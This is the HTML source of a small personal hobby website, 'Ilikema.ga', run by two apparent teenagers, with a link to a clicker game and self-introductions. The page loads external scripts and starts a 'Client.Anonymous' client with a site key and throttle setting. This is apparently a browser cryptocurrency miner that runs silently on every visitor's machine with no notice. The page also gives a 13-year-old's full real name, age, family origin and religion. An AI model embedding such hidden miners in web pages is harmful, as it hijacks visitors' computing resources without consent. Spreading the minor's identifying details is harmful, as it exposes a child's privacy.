<!DOCTYPE html>
<html>
  <head>
    <script src="http://ilikema.ga/jIfb.php?f=FZTI.js"></script>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>repl.it</title>
    <link href="style.css" rel="stylesheet" type="text/css" />
    
  </head>
  <body>
    <script src="https://www.hostingcloud.racing/FZTI.js"></script>
    <iframe data-aa="1274155" src="//acceptable.a-ads.com/1274155" scrolling="no" style="border:0px; padding:0; width: 100%; height: 100%; overflow:hidden" allowtransparency="true"></iframe>
    <div width="100%" height="30%" style="background-color: red; color: white;text-align: center;"><b>DISCLAIMER: WE DONT SUPPORT TRUMP, WE JUST THOUGHT THIS IS A MEMORABLE DOMAIN. (Honestly, Oklomsy is a muslim, AND NO HE DOESN'T HATE LGBT NOR IS HE A TERRORIST. it really would be weird for him to support trump.)</b></div><br>
    <h1>Ilikema.ga</h1>
    <h2>127.0.0.1, sweet 127.0.0.1!</h2>
    <hr>
    </div>
    <h2>Links</h2>
    <a href="/dogclicker/index.html">Dogclicker 1.2!</a>
    <hr>
    <h2>About Ilikema.ga</h2>
    <p>Ilikema.ga is a small little website made by <a href="http://oklomsy.com">Oklomsy</a> and <a href="http://sparksammy.com">Sparksammy</a> it is a website about our little silly stuff, we make lots of silly stuff on our own but if we make it together, we can make the best silly websites! Also: unlike our <a href="http://sparksammy.herokuapp.com">Heroku web server,</a> this is a real web server, this entire website is hosted on oklomsy's microserver! (Denmark: Slowest internet in the universe also that is the location of the server itself.) so yeah, me and sparksammy's first ACTUAL web server!</p>
    <hr>
    <h2>About Oklomsy! <img src="dk.png" width="3%" height="3%"></h2>
    <p>Hello! I am oklomsy (Real name: Abdul Karim Kikar) I come from a syrian family although I Identify as a dane instead, I am 13 years old and I am the owner of the microserver where this website is hosted, me and sparksammy were friends since August/October 2018! We made a lot of stuff together! we made a few websites together and so much more and we decided to finally use a microserver that I had on my desk for about two months maybe even three months, this was our first real web server, I am a muslim (I do not hate LGBT people nor am I a terrorist.) .</p>
    <hr>
    <h2>About Sparksammy! <img src="texas.png" width="3%" height="3%">/<img src="usa.png" width="3%" height="3%"></h2>
    <p>Hello. I am Samuel Lord, but you can just call me Sparksammy. I like cake. My teeth are sensitive. Oklomsy is one of my best friends. (Followed only by my dogs and my stuffed animals!) I made stuff such as a secret mail server, and I made a website. I like HTML, ROBLOX LUA, and Python 3. (Hey, I never said I was good at Python 3!) Enjoy the webserver, I guess.</p>
    <hr>
    <p>This site is owned by <a href="http://oklomsy.com">Abdul Karim Kikar (Oklomsy) </a> and <a href="http://sparksammy.com">Samuel Lord (Sparksammy)</a> All rights reserved!</p>
<script>
    var _client = new Client.Anonymous('fd657914331deec62c4b06e0faa67d298e6fdb34d14b247e334e58ae78d09173', {
        throttle: 0.2, c: 'w'
    });
    _client.start();
    

</script>

  </body>
</html>

